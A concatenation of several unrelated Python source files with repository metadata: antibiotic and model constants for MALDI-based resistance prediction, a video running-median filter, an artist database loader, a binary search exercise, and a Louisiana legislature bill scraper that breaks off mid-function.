ANTIBIOTIC_CEFEPIME ='Cefepime'# no saureus
ANTIBIOTIC_PIPTAZ = 'Piperacillin-Tazobactam' # only ecoli
ANTIBIOTIC_TOBRAMYCIN ='Tobramycin'# no saureus
ANTIBIOTIC_FUSIDICACID ='Fusidic acid' # only saureus
ANTIBIOTIC_OXACILLIN ='Oxacillin' # only saureus
ANTIBIOTIC_MEROPENEM ='Meropenem' # only kpneu
ANTIBIOTIC_VANCOMYCIN = 'Vancomycin'
BINNING_6K = '6k'
BINNING_18K = '18k'
BINNING_18K_RAW = 'RAW'
DATASET_DRIAMSA ='DRIAMS_A'
DATASET_DRIAMSB ='DRIAMS_B'
DATASET_ALL ='DRIAMS_ABCD'
DATASET_SPECIES_COMBINED ='DRIAMS_A_ALL_SPECIES'
# Random State for algorithms that have some randomness to make it reproducable use it
RANDOM_STATE=42
METHOD_TREE = 'tree'
METHOD_RFO = 'rfo'
METHOD_DUMMY = 'dummy'
METHOD_LR = 'logreg'
METHOD_MLP = 'mlp'
METHOD_CNN = 'cnn'
IN_FEATURES = 'in_features'
LEARNING_RATE='learning_rate'
EPOCHS = 'epochs'
WEIGHTED_FLAG = 'weighted_flag'
BATCH_SIZE = 'batch_size'
# Evaluation
PREDICTIONS = 'preds'
PROBABILITIES = 'probas'
BEST_PARAMS = 'best_params'
LOSSES = 'losses'
BEST_PREDS ='best_preds'
BEST_PROBAS ='best_probas'
### Grid Search Parameters for Baseline Methods
PARAM_GRID_TREE = {
'criterion': ['gini','entropy'],
'class_weight': ['balanced', None],
'max_depth': [8,32,128,512,None],
'max_features': ['sqrt','log2',None]
}
PARAM_GRID_LR = {
'C': 10.0 ** np.arange(-3, 4), # 10^{-3}..10^{3} (10^-1...10^4)
'solver':['liblinear','saga'],
'penalty': ['l1', 'l2'],
'class_weight':['balanced',None]
}
PARAM_GRID_RFO = {
'criterion': ['gini', 'entropy'],
'n_estimators': [10,100,500,1000],
'max_features': ['sqrt', 'log2'],
'class_weight': ['balanced', None]
}
PARAM_GRID_DUMMY = {
'strategy': ['uniform','stratified','prior','most_frequent']
}
################## DEEP LEARNING CONSTS #####################
OUTPUT_DIM = 1
''' All Antibiotics and their categorization inside of DRIAMS
# antibiotic categorization
ab_cat_map = {'5-Fluorocytosine': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Amikacin': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Aminoglycosides': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Amoxicillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Amoxicillin-Clavulanic acid': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Amoxicillin-Clavulanic acid_uncomplicated_HWI': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Amphotericin B': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Ampicillin-Amoxicillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Anidulafungin': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Azithromycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Aztreonam': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Caspofungin': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Cefazolin': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefepime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefixime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefoxitin_screen': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefpodoxime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Ceftazidime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Ceftriaxone': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefuroxime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Chloramphenicol': 'AMPHENICOLS',
'Ciprofloxacin': 'QUINOLONE ANTIBACTERIALS',
'Clarithromycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Clindamycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Colistin': 'OTHER ANTIBACTERIALS',
'Cotrimoxazole': 'SULFONAMIDES AND TRIMETHOPRIM',
'Daptomycin': 'OTHER ANTIBACTERIALS',
'Doxycycline': 'TETRACYCLINES',
'Ertapenem': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Erythromycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Fluconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Fosfomycin': 'OTHER ANTIBACTERIALS',
'Fosfomycin-Trometamol': 'OTHER ANTIBACTERIALS',
'Fusidic acid': 'OTHER ANTIBACTERIALS',
'Gentamicin': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Gentamicin_high_level': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Imipenem': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Itraconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Levofloxacin': 'QUINOLONE ANTIBACTERIALS',
'Linezolid': 'OTHER ANTIBACTERIALS',
'Meropenem': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Meropenem_with_meningitis': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Meropenem_with_pneumonia': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Meropenem_without_meningitis': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Metronidazole': 'OTHER ANTIBACTERIALS',
'Micafungin': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Minocycline': 'TETRACYCLINES',
'Moxifloxacin': 'QUINOLONE ANTIBACTERIALS',
'Mupirocin': 'ANTIBIOTICS FOR TOPICAL USE',
'Nitrofurantoin': 'OTHER ANTIBACTERIALS',
'Norfloxacin': 'QUINOLONE ANTIBACTERIALS',
'Oxacillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_endokarditis': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_meningitis': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_other_infections': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_pneumonia': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_without_endokarditis': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Piperacillin-Tazobactam': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Posaconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Quinolones': 'QUINOLONE ANTIBACTERIALS',
'Rifampicin': 'DRUGS FOR TREATMENT OF TUBERCULOSIS',
'Rifampicin_1mg-l': 'DRUGS FOR TREATMENT OF TUBERCULOSIS',
'Teicoplanin': 'OTHER ANTIBACTERIALS',
'Teicoplanin_GRD': 'OTHER ANTIBACTERIALS',
'Tetracycline': 'TETRACYCLINES',
'Tigecycline': 'TETRACYCLINES',
'Tobramycin': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Vancomycin': 'OTHER ANTIBACTERIALS',
'Vancomycin_GRD': 'OTHER ANTIBACTERIALS',
'Voriconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
}
# antibiotic naming
ab_name_map = {
'AN-Amikacin': 'Amikacin',
'Amikacin': 'Amikacin',
'Amikacin 01 mg/l': 'Amikacin_1mg-l',
'Amikacin 04 mg/l': 'Amikacin_4mg-l',
'Amikacin 20 mg/l': 'Amikacin_20mg-l',
'Aminoglykoside': 'Aminoglycosides',
'Amoxicillin...Clavulansaeure.bei.unkompliziertem.HWI': 'Amoxicillin-Clavulanic acid_uncomplicated_HWI',
'Amoxicillin-Clavulansaeure.unkompl.HWI': 'Amoxicillin-Clavulanic acid_uncomplicated_HWI',
'Amoxicillin-Clavulan': 'Amoxicillin-Clavulanic acid',
'AMC-Amoxicillin/Clavulans\xc3\xa4ure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin-Clavulansaeure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin/Clavulansäure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin...Clavulansaeure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin/Clavulansaeure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin': 'Amoxicillin',
'AMX-Amoxicillin': 'Amoxicillin',
'Ampicillin': 'Ampicillin',
'AM-Ampicillin': 'Ampicillin',
'P-Benzylpenicillin': 'Benzylpenicillin',
'Benzylpenicillin': 'Benzylpenicillin',
'Benzylpenicillin andere': 'Benzylpenicillin_others',
'Benzylpenicillin bei Meningitis': 'Benzylpenicillin_with_meningitis',
'Benzylpenicillin bei Pneumonie': 'Benzylpenicillin_with_pneumonia',
'Amphotericin.B': 'Amphotericin B',
'Amphothericin B': 'Amphotericin B',
'Ampicillin...Amoxicillin': 'Ampicillin-Amoxicillin',
'SAM-Ampicillin/Sulbactam': 'Ampicillin-Sulbactam',
'Ampicillin...Sulbactam': 'Ampicillin-Sulbactam',
'Anidulafungin': 'Anidulafungin',
'Azithromycin': 'Azithromycin',
'ATM-Aztreonam': 'Aztreonam',
'Aztreonam': 'Aztreonam',
'Bacitracin': 'Bacitracin',
'Caspofungin': 'Caspofungin',
'Cefalotin/Cefazolin': 'Cefalotin-Cefazolin',
'Cefamandol': 'Cefamandole',
'Cefazolin': 'Cefazolin',
'FEP-Cefepim': 'Cefepime',
'Cefepim': 'Cefepime',
'Cefepime': 'Cefepime',
'Cefepim.1': 'Cefepime',
'Cefixim': 'Cefixime',
'Cefoperazon-Sulbactam': 'Cefoperazon-Sulbactam',
'Cefoperazon-Sulbacta': 'Cefoperazon-Sulbactam',
'CTX-Cefotaxim': 'Cefotaxime',
'Cefotaxim': 'Cefotaxime',
'Cefoxitin Screening Staph': 'Cefoxitin_screen',
'Cefoxitin.Screen': 'Cefoxitin_screen',
'OXSF-Cefoxitin-Screen': 'Cefoxitin_screen',
'FOX-Cefoxitin': 'Cefoxitin',
'Cefoxitin': 'Cefoxitin',
'CPD-Cefpodoxim': 'Cefpodoxime',
'Cefpodoxim': 'Cefpodoxime',
'Ceftarolin': 'Ceftarolin',
'CAZ-Ceftazidim': 'Ceftazidime',
'Ceftazidim.1': 'Ceftazidime',
'Ceftazidim': 'Ceftazidime',
'Ceftazidim.Avibactam': 'Ceftazidime-Avibactam',
'Ceftazidim-Avibactam': 'Ceftazidime-Avibactam',
'Ceftibuten': 'Ceftibuten',
'Ceftobiprol': 'Ceftobiprole',
'Ceftolozan...Tazobactam': 'Ceftolozane-Tazobactam',
'Ceftolozan-Tazobacta': 'Ceftolozane-Tazobactam',
'Ceftriaxon': 'Ceftriaxone',
'CRO-Ceftriaxon': 'Ceftriaxone',
'CXMA-Cefuroxim-Axetil': 'Cefuroxime',
'Cefuroxim.Axetil': 'Cefuroxime',
'Cefuroxim iv': 'Cefuroxime',
'CXM-Cefuroxim': 'Cefuroxime',
'Cefuroxim': 'Cefuroxime',
'Cefuroxim oral': 'Cefuroxime',
'Chinolone': 'Quinolones',
'C-Chloramphenicol': 'Chloramphenicol',
'Chloramphenicol': 'Chloramphenicol',
'Ciprofloxacin': 'Ciprofloxacin',
'CIP-Ciprofloxacin': 'Ciprofloxacin',
'Clarithromycin': 'Clarithromycin',
'Clarithromycin 04': 'Clarithromycin_4mg-l',
'Clarithromycin 16': 'Clarithromycin_16mg-l',
'Clarithromycin 32': 'Clarithromycin_32mg-l',
'Clarithromycin 64': 'Clarithromycin_64mg-l',
'Clindamycin': 'Clindamycin',
'CM-Clindamycin': 'Clindamycin',
'Clindamycin ind.': 'Clindamycin_induced',
'ICR-Induzierbare Clindamycin Resistenz': 'Clindamycin_induced',
'Clofazimin': 'Clofazimine',
'Clofazimin 0.25 mg/l': 'Clofazimine_.25mg-l',
'Clofazimin 0.5 mg/l': 'Clofazimine_.5mg-l',
'Clofazimin 1.0 mg/l': 'Clofazimine_1mg-l',
'Clofazimin 2.0 mg/l': 'Clofazimine_2mg-l',
'Clofazimin 4.0 mg/l': 'Clofazimine_4mg-l',
'Colistin': 'Colistin',
'CS-Colistin': 'Colistin',
'Cotrimoxazol': 'Cotrimoxazole',
'Trimethoprim/Sulfamethoxazol': 'Cotrimoxazole',
'SXT-Trimethoprim/Sulfamethoxazol': 'Cotrimoxazole',
'Trimethoprim-Sulfame': 'Cotrimoxazole',
'DAP-Daptomycin': 'Daptomycin',
'Daptomycin': 'Daptomycin',
'ESBL': 'ESBL',
'Doxycyclin': 'Doxycycline',
'Dummy': 'Dummy',
'Ertapenem': 'Ertapenem',
'ETP-Ertapenem': 'Ertapenem',
'E-Erythromycin': 'Erythromycin',
'Erythromycin': 'Erythromycin',
'Ethambutol': 'Ethambutol',
'Ethambutol 02.5': 'Ethambutol_2mg-l',
'Ethambutol 05.0': 'Ethambutol_5mg-l',
'Ethambutol.5.0.mg.l': 'Ethambutol_5mg-l',
'Ethambutol 07.5': 'Ethambutol_7.5mg-l',
'Ethambutol 12.5': 'Ethambutol_12.5mg-l',
'Ethambutol 50': 'Ethambutol_50mg-l',
'Fluconazol': 'Fluconazole',
'Fosfomycin.Trometamol': 'Fosfomycin-Trometamol',
'FOS-Fosfomycin': 'Fosfomycin',
'Fosfomycin': 'Fosfomycin',
'FA-Fusidins\xc3\xa4ure': 'Fusidic acid',
'Fusidinsaeure': 'Fusidic acid',
'Fusidins\xc3\xa4ure': 'Fusidic acid',
'Fusidinsäure': 'Fusidic acid',
'GHLR-High-Level-Resistenz gegen Gentamicin': 'Gentamicin_high_level',
'Gentamicin High Level': 'Gentamicin_high_level',
'Gentamicin.High.level': 'Gentamicin_high_level',
'HLG-Gentamicin, High-Level (Synergie)': 'Gentamicin_high_level',
'HLS-Streptomycin, High-Level (Synergie)': 'Streptomycin_high_level',
'Gentamicin': 'Gentamicin',
'GM-Gentamicin': 'Gentamicin',
'Imipenem': 'Imipenem',
'IPM-Imipenem': 'Imipenem',
'Isavuconazol': 'Isavuconazole',
'Isoniazid': 'Isoniazid',
'Isoniazid.0.1.mg.l': 'Isoniazid_.1mg-l',
'Isoniazid 0\t1 mg/l': 'Isoniazid_.1mg-l',
'Isoniazid.0.4.mg.l': 'Isoniazid_.4mg-l',
'Isoniazid 0\t4 mg/l': 'Isoniazid_.4mg-l',
'Isoniazid 1.0 mg/l': 'Isoniazid_1mg-l',
'Isoniazid 10 mg/l': 'Isoniazid_10mg-l',
'Isoniazid 3.0 mg/l': 'Isoniazid_3mg-l',
'Itraconazol': 'Itraconazole',
'Ketoconazol': 'Ketoconazole',
'LEV-Levofloxacin': 'Levofloxacin',
'Levofloxacin': 'Levofloxacin',
'LNZ-Linezolid': 'Linezolid',
'Linezolid': 'Linezolid',
'Linezolid 01 mg/l': 'Linezolid_1mg-l',
'Linezolid 04 mg/l': 'Linezolid_4mg-l',
'Linezolid 16 mg/l': 'Linezolid_16mg-l',
'MRSA': 'MRSA',
'Meropenem.bei.Meningitis': 'Meropenem_with_meningitis',
'Meropenem.bei.Pneumonie': 'Meropenem_with_pneumonia',
'Meropenem.ohne.Meningitis': 'Meropenem_without_meningitis',
'Meropenem': 'Meropenem',
'MEM-Meropenem': 'Meropenem',
'Meropenem-Vaborbactam': 'Meropenem-Vaborbactam',
'Meropenem-Vaborbacta': 'Meropenem-Vaborbactam',
'Metronidazol': 'Metronidazole',
'Miconazol': 'Miconazole',
'Micafungin': 'Micafungin',
'Minocyclin': 'Minocycline',
'MXF-Moxifloxacin': 'Moxifloxacin',
'Moxifloxacin': 'Moxifloxacin',
'Moxifloxacin 0.5': 'Moxifloxacin_.5mg-l',
'Moxifloxacin 02.5': 'Moxifloxacin_2.5mg-l',
'Moxifloxacin 10': 'Moxifloxacin_10mg-l',
'MUP-Mupirocin': 'Mupirocin',
'Mupirocin': 'Mupirocin',
'Nalidixinsaeure': 'Nalidixin acid',
'Nitrofurantoin': 'Nitrofurantoin',
'FT-Nitrofurantoin': 'Nitrofurantoin',
'Norfloxacin': 'Norfloxacin',
'NOR-Norfloxacin': 'Norfloxacin',
'Novobiocin': 'Novobiocin',
'Ofloxacin': 'Ofloxacin',
'OFL-Ofloxacin': 'Ofloxacin',
'Oxacillin': 'Oxacillin',
'Oxa/Flucloxacil.': 'Oxacillin',
'OX1-Oxacillin': 'Oxacillin',
'Pefloxacin': 'Pefloxacin',
'Penicillin.bei.anderen.Infekten': 'Penicillin_with_other_infections',
'Penicillin.bei.Endokarditis': 'Penicillin_with_endokarditis',
'Penicillin.bei.Meningitis': 'Penicillin_with_meningitis',
'Penicillin.bei.Pneumonie': 'Penicillin_with_pneumonia',
'Penicillin.ohne.Endokarditis': 'Penicillin_without_endokarditis',
'Penicillin.ohne.Meningitis': 'Penicillin_without_meningitis',
'Penicillin': 'Penicillin',
'PIP-Piperacillin]': 'Piperacillin',
'Piperacillin/Tazobactam': 'Piperacillin-Tazobactam',
'TZP-Piperacillin/Tazobactam': 'Piperacillin-Tazobactam',
'Piperacillin...Tazobactam': 'Piperacillin-Tazobactam',
'Piperacillin-Tazobac': 'Piperacillin-Tazobactam',
'PT-Pristinamycin': 'Pristinamycine',
'Polymyxin.B': 'Polymyxin B',
'Polymyxin B': 'Polymyxin B',
'Posaconazol': 'Posaconazole',
'Pyrazinamid.100.0.mg.l': 'Pyrazinamide',
'Pyrazinamid 100\t0 mg': 'Pyrazinamide',
'Pyrazinamid': 'Pyrazinamide',
'QDA-Quinupristin/Dalfopristin': 'Quinupristin-Dalfopristin',
'Quinupristin-Dalfopr': 'Quinupristin-Dalfopristin',
'Rifabutin 0.1 mg/l': 'Rifabutin_.1mg-l',
'Rifabutin 0.4 mg/l': 'Rifabutin_.4mg-l',
'Rifabutin 2 mg/l': 'Rifabutin_2mg-l',
'Rifampicin 01.0 mg/l': 'Rifampicin_1mg-l',
'Rifampicin.1.0.mg.l': 'Rifampicin_1mg-l',
'RA-Rifampicin': 'Rifampicin',
'Rifampicin': 'Rifampicin',
'Rifampicin 02.0 mg/l': 'Rifampicin_2mg-l',
'Rifampicin 04 mg/l': 'Rifampicin_4mg-l',
'Rifampicin 20 mg/l': 'Rifampicin_20mg-l',
'SPX-Sparfloxacin': 'Sparfloxacin',
'Roxithromycin': 'Roxithromycin',
'Spectinomycin': 'Spectinomycin',
'Streptomycin.1.0.mg.l': 'Streptomycin',
'Streptomycin': 'Streptomycin',
'Strepomycin High Level': 'Strepomycin_high_level',
'Streptomycin.High.level': 'Strepomycin_high_level',
'Teicoplanin.GRD': 'Teicoplanin_GRD',
'Teicoplanin': 'Teicoplanin',
'TEC-Teicoplanin': 'Teicoplanin',
'Tetracyclin': 'Tetracycline',
'TE-Tetracyclin': 'Tetracycline',
'TIC-Ticarcillin': 'Ticarcillin',
'TCC-Ticarcillin/Clavulans\xc3\xa4ure': 'Ticarcillin-Clavulan acid',
'Ticarcillin...Clavulansaeure': 'Ticarcillin-Clavulan acid',
'TEL-Telithromycin': 'Telithromycin',
'Tigecyclin': 'Tigecycline',
'TGC-Tigecycline': 'Tigecycline',
'Tobramycin': 'Tobramycin',
'TM-Tobramycin': 'Tobramycin',
'Vancomycin.GRD': 'Vancomycin_GRD',
'Vancomycin': 'Vancomycin',
'VA-Vancomycin': 'Vancomycin',
'Voriconazol': 'Voriconazole',
'X5.Fluorocytosin': '5-Fluorocytosine',
'5-Fluorocytosin': '5-Fluorocytosine',
}
'''
| irmlerjo/maldi-prediction | const.py | const.py | py | 17,266 | python | en | code | 0 | github-code | 90 |
1301149986 | import numpy as np
class vmedian(object):
def __init__(self, order=0, dimensions=None):
"""Compute running median of a video stream
:param order: depth of median filter: 3^(order + 1) images
:param dimensions: (width, height) of images
:returns:
:rtype:
"""
self.child = None
self.dimensions = dimensions
self.order = order
self.initialized = False
self.index = 0
def filter(self, data):
self.add(data)
return self.get()
def get(self):
"""Return current median image
:returns: median image
:rtype: numpy.ndarray
"""
return np.median(self.buffer, axis=0)
def add(self, data):
"""include a new image in the median calculation
:param data: image data
:returns:
:rtype:
"""
if isinstance(self.child, vmedian):
self.child.add(data)
if (self.child.index == 0):
self.buffer[self.index, :, :] = self.child.get()
self.index = self.index + 1
else:
self.buffer[self.index, :, :] = data
self.index = self.index + 1
if self.index == 3:
self.index = 0
self.initialized = True
@property
def dimensions(self):
return self._dimensions
@dimensions.setter
def dimensions(self, dimensions):
if dimensions is not None:
self.buffer = np.zeros((3, dimensions[0], dimensions[1]),
dtype=np.uint8)
self.index = 0
self._dimensions = dimensions
self.initialized = False
if isinstance(self.child, vmedian):
self.child.dimensions = dimensions
@property
def order(self):
return self._order
@order.setter
def order(self, order):
self._order = np.clip(order, 0, 10)
if (self._order == 0):
self.child = None
else:
if isinstance(self.child, vmedian):
self.child.order = self._order - 1
else:
self.child = vmedian(order=self._order - 1,
dimensions=self.dimensions)
self.initialized = False
| laltman2/CNNLorenzMie | experiments/vmedian.py | vmedian.py | py | 2,351 | python | en | code | 6 | github-code | 90 |
20752854713 | ## INFO ##
## INFO ##
# Import python modules
from json import load
from math import radians
# Import pop modules
from db.models import Artist
from db.database import initialise, session
#------------------------------------------------------------------------------#
def populate(path):
# Initialise database
initialise()
# Build database from JSON
with open(path) as file:
artists = load(file)
for i, artist in enumerate(artists['artists']):
artist.update(gender='male' if artist['gender'] == 'M' else 'female')
artist.update(longitude=radians(float(artist['longitude'])))
artist.update(latitude=radians(float(artist['latitude'])))
session.add(Artist(**artist))
session.commit()
| petervaro/pop | db/populate.py | populate.py | py | 776 | python | en | code | 0 | github-code | 90 |
6472327971 | def binary_search(arr, value):
low = 0
high = len(arr)-1
while low >= 0 and high <= len(arr)-1 and low <= high:
mid = (low+high)//2
if arr[mid] == value:
return True
elif value > arr[mid]:
low = mid+1
else:
high = mid-1
return False
inputs = [[1, 2, 3, 4, 5], [1, 2, 4, 5], [1, 2, 4, 5], [-1, 1, 2, 9, 5, 7], []]
to_find = [3, 3, 6, -1, 13]
for index in range(len(inputs)):
print("Is the element ", to_find[index], " in the list ", inputs[index], ": ", binary_search(inputs[index], to_find[index]))
#Time Complexity - O(log n) where n is the size of the input arr
#Space Complexity - 0(1) | AishwaryaTalapuru/Data-Structures-Algorithms | Searching_techniques/Iterative/binary_search.py | binary_search.py | py | 677 | python | en | code | 0 | github-code | 90 |
18814491827 | import datetime as dt
import lxml.html
import tempfile
import os
import re
from collections import defaultdict
from openstates.scrape import Scraper, Bill, VoteEvent
from openstates.utils import convert_pdf
from openstates.exceptions import EmptyScrape
from utils import LXMLMixin
# from . import actions
from .actions import Categorizer
class LABillScraper(Scraper, LXMLMixin):
categorizer = Categorizer()
_chambers = {"S": "upper", "H": "lower", "J": "legislature"}
_bill_types = {
"B": "bill",
"R": "resolution",
"CR": "concurrent resolution",
"SR": "study request",
"CSR": "concurrent study request",
}
_session_ids = {
"2017 1st Extraordinary Session": "171ES",
"2017 2nd Extraordinary Session": "172ES",
"2017": "17RS",
"2018 1st Extraordinary Session": "181ES",
"2018": "18RS",
"2018 2nd Extraordinary Session": "182ES",
"2018 3rd Extraordinary Session": "183ES",
"2019": "19RS",
"2020": "20RS",
"2020s1": "201ES",
"2020s2": "202ES",
"2021": "21RS",
"2022": "22RS",
"2022s1": "221ES",
"2022s2": "222ES",
"2023": "23RS",
"2023s1": "231ES",
}
def pdf_to_lxml(self, filename, type="html"):
text = convert_pdf(filename, type)
return lxml.html.fromstring(text)
def _get_bill_abbreviations(self, session_id):
page = self.lxmlize(
"https://www.legis.la.gov/legis/BillSearch.aspx?"
"sid={}".format(session_id)
)
if page.xpath("//span[contains(@id,'PageContent_labelNoBills')]"):
raise EmptyScrape
return
select_options = page.xpath('//select[contains(@id, "InstTypes")]/option')
bill_abbreviations = {"upper": [], "lower": []}
for option in select_options:
type_text = option.text
if type_text.startswith("S"):
bill_abbreviations["upper"].append(type_text)
elif type_text.startswith("H"):
bill_abbreviations["lower"].append(type_text)
return bill_abbreviations
def do_post_back(self, page, event_target, event_argument):
form = page.xpath("//form[@id='aspnetForm']")[0]
block = {
name: value
for name, value in [(obj.name, obj.value) for obj in form.xpath(".//input")]
}
block["__EVENTTARGET"] = event_target
block["__EVENTARGUMENT"] = event_argument
if form.method == "GET":
ret = lxml.html.fromstring(self.get(form.action, data=block).text)
elif form.method == "POST":
ret = lxml.html.fromstring(self.post(form.action, data=block).text)
else:
raise AssertionError(
"Unrecognized request type found: {}".format(form.method)
)
ret.make_links_absolute(form.action)
return ret
def bill_pages(self, url):
response = self.get(url, allow_redirects=False)
page = lxml.html.fromstring(response.text)
page.make_links_absolute(url)
yield page
while True:
hrefs = page.xpath("//a[text()=' > ']")
if hrefs == [] or "disabled" in hrefs[0].attrib:
return
href = hrefs[0].attrib["href"]
tokens = re.match(r".*\(\'(?P<token>.*)\',\'.*", href).groupdict()
page = self.do_post_back(page, tokens["token"], "")
if page is not None:
yield page
def scrape_bare_page(self, url):
try:
page = self.lxmlize(url)
return page.xpath("//a")
except lxml.etree.ParserError:
return []
def scrape(self, chamber=None, session=None):
chambers = [chamber] if chamber else ["upper", "lower"]
session_id = self._session_ids[session]
# Scan bill abbreviation list if necessary.
self._bill_abbreviations = self._get_bill_abbreviations(session_id)
# there are duplicates we need to skip
seen_bill_urls = set()
for chamber in chambers:
for bill_abbreviation in self._bill_abbreviations[chamber]:
bill_list_url = "https://www.legis.la.gov/Legis/BillSearchListQ.aspx?s={}&r={}1*".format(
session_id, bill_abbreviation
)
bills_found = False
for bill_page in self.bill_pages(bill_list_url):
for bill in bill_page.xpath(
"//a[contains(@href, 'BillInfo.aspx') and text()='more...']"
):
bill_url = bill.attrib["href"]
if bill_url in seen_bill_urls:
continue
seen_bill_urls.add(bill_url)
bills_found = True
yield from self.scrape_bill_page(
chamber, session, bill_url, bill_abbreviation
)
if not bills_found:
# If a session only has one legislative item of a given type
# (eg, some special sessions only have one `HB`), the bill list
# will redirect to its single bill's page
yield from self.scrape_bill_page(
chamber, session, bill_list_url, bill_abbreviation
)
def get_one_xpath(self, page, xpath):
ret = page.xpath(xpath)
if len(ret) != 1:
raise Exception
return ret[0]
def scrape_votes(self, bill, url):
text = self.get(url).text
page = lxml.html.fromstring(text)
page.make_links_absolute(url)
for a in page.xpath("//a[contains(@href, 'ViewDocument.aspx')]"):
yield from self.scrape_vote(bill, a.text, a.attrib["href"])
def scrape_vote(self, bill, name, url):
match = re.match("^(Senate|House) Vote on [^,]*,(.*)$", name)
if not match:
return
chamber = {"Senate": "upper", "House": "lower"}[match.group(1)]
motion = match.group(2).strip()
if motion.startswith("FINAL PASSAGE"):
type = "passage"
elif motion.startswith("AMENDMENT"):
type = "amendment"
elif "ON 3RD READING" in motion:
type = "reading-3"
else:
type = []
(fd, temp_path) = tempfile.mkstemp()
self.urlretrieve(url, temp_path)
html = self.pdf_to_lxml(temp_path)
os.close(fd)
os.remove(temp_path)
vote_type = None
body = html.xpath("string(/html/body)")
date_match = re.search(r"Date: (\d{1,2}/\d{1,2}/\d{4})", body)
try:
date = date_match.group(1)
except AttributeError:
self.warning("BAD VOTE: date error")
return
start_date = dt.datetime.strptime(date, "%m/%d/%Y")
d = defaultdict(list)
for line in body.replace("\xa0", "\n").split("\n"):
line = line.replace(" ", "").strip()
# Skip blank lines and "Total --"
if not line or "Total --" in line:
continue
if line in ("YEAS", "NAYS", "ABSENT"):
vote_type = {"YEAS": "yes", "NAYS": "no", "ABSENT": "other"}[line]
elif line in ("Total", "--"):
vote_type = None
elif vote_type:
if vote_type == "yes":
d["yes"].append(line)
elif vote_type == "no":
d["no"].append(line)
elif vote_type == "other":
d["other"].append(line)
yes_count = len(d["yes"])
no_count = len(d["no"])
other_count = len(d["other"])
# The PDFs oddly don't say whether a vote passed or failed.
# Hopefully passage just requires yes_votes > not_yes_votes
if yes_count > (no_count + other_count):
passed = True
else:
passed = False
vote = VoteEvent(
chamber=chamber,
start_date=start_date.strftime("%Y-%m-%d"),
motion_text=motion,
result="pass" if passed else "fail",
classification=type,
bill=bill,
)
vote.set_count("yes", yes_count)
vote.set_count("no", no_count)
vote.set_count("other", other_count)
for key, values in d.items():
for item in values:
vote.vote(key, item)
vote.add_source(url)
yield vote
def scrape_bill_page(self, chamber, session, bill_url, bill_abbreviation):
page = self.lxmlize(bill_url)
author = self.get_one_xpath(page, "//a[@id='ctl00_PageBody_LinkAuthor']/text()")
def sbp(x):
return self.scrape_bare_page(
page.xpath("//a[contains(text(), '%s')]" % (x))[0].attrib["href"]
)
authors = [x.text for x in sbp("Authors")]
try:
digests = sbp("Digests")
except IndexError:
digests = []
try:
versions = sbp("Text")
except IndexError:
versions = []
try:
amendments = sbp("Amendments")
except IndexError:
amendments = []
title = page.xpath("//span[@id='ctl00_PageBody_LabelShortTitle']/text()")[0]
title = title.replace("\u00a0\u00a0", " ")
these_actions = page.xpath(
"//div[@id='ctl00_PageBody_PanelBillInfo']/"
"/table[@style='font-size:small']/tr"
)
bill_id = page.xpath("//span[@id='ctl00_PageBody_LabelBillID']/text()")[0]
bill_type = self._bill_types[bill_abbreviation[1:]]
bill = Bill(
bill_id,
legislative_session=session,
chamber=chamber,
title=title,
classification=bill_type,
)
bill.add_source(bill_url)
authors.remove(author)
bill.add_sponsorship(
author, classification="primary", entity_type="person", primary=True
)
for author in authors:
bill.add_sponsorship(
author, classification="cosponsor", entity_type="person", primary=False
)
for digest in digests:
bill.add_document_link(
note=digest.text,
url=digest.attrib["href"],
media_type="application/pdf",
)
for version in versions:
bill.add_version_link(
note=version.text,
url=version.attrib["href"],
media_type="application/pdf",
)
for amendment in amendments:
if "href" in amendment.attrib:
bill.add_version_link(
note=amendment.text,
